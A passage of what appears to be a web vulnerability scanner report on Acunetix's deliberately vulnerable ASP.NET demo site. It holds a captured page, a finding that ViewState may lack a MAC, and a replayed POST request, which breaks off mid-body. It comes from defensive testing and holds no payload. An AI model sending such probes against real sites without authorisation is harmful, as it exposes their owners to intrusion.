          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        15. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9